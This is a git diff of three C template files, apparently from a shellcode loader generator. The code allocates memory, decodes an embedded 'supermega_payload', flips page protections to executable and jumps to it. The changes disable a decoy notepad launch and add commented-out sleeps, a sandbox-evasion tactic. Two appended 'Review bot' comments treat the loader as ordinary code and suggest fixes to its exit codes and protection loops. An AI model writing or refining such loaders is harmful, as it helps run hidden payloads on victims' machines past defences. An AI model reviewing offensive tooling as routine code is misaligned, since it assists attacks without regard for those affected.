diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c
index 6a48f2f..c24caad 100644
--- a/data/source/carrier/alloc_rw_rwx/template.c
+++ b/data/source/carrier/alloc_rw_rwx/template.c
@@ -30,12 +30,15 @@ int main()
  }
  // Decoy
- WinExec("C:\\windows\\system32\\notepad.exe", 1);
+ //WinExec("C:\\windows\\system32\\notepad.exe", 1);
  // Allocate 1
  // char *dest = ...
  char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW);
+ // Wait a bit
+ //sleep_ms(2000);
+
  // Copy (and decode)
  // from: supermega_payload[]
  // to: dest[]
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index af93c81..458742f 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -29,10 +29,16 @@ int main()
  return 6;
  }
+ // Decoy
+ //WinExec("C:\\windows\\system32\\notepad.exe", 1);
+
  // Allocate 1
  // char *dest = ...
  char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW);
+ // Wait a bit
+ //Sleep(2000);
+
  // Copy (and decode)
  // from: supermega_payload[]
  // to: dest[]
diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c
index b85bab9..5251a73 100644
--- a/data/source/carrier/change_rwx_rx/template.c
+++ b/data/source/carrier/change_rwx_rx/template.c
@@ -22,15 +22,19 @@ int main()
  // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
  // can do only RW otherwise?
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RWX, &result) == 0) {
- return 16;
- }
+ for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
+ if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) {
+ return 16;
+ }
+ }
  {{ plugin_decoder }}
- if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
- return 17;
- }
+ for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) {
+ if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) {
+ return 16;
+ }
+ }
  // Execute *dest
  (*(void(*)())(dest))();
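Review bot: The disabled statements in alloc_rw_rwx/template.c are left behind as commented-out code with no note on why, and the same applies to the hunk in alloc_rw_rx/template.c. The two templates also disagree on the disabled call, `//sleep_ms(2000);` here and `//Sleep(2000);` there, and no `sleep_ms` definition is visible in either hunk, so the first may not compile if it is ever re-enabled. Someone reading a template cannot tell from it whether the generated program launches a second process or pauses, so either delete the lines or extend the comments, for example `// Decoy (disabled: <reason>)`. main's body starts and ends outside both hunks.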
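Review bot: In change_rwx_rx/template.c the second loop's failure path returns 16, the code the first loop already uses, where the removed code returned 17, so a failed RX transition can no longer be told apart from a failed RWX transition by exit status; `return 17;` keeps them distinct. The loop bounds also disagree, `({{PAYLOAD_LEN}}/4096)+1` for the RWX pass and `{{PAYLOAD_LEN}}/4096` for the RX pass, so the last page changed by the first loop stays writable and executable, and the second loop does not run at all for a payload under 4096 bytes; if that is deliberate it needs a comment. The literals 4096 and 16 are unexplained, and the per-page count may miss the final page if `dest` is not page-aligned, which the hunk does not show. main's body starts and ends outside the hunk.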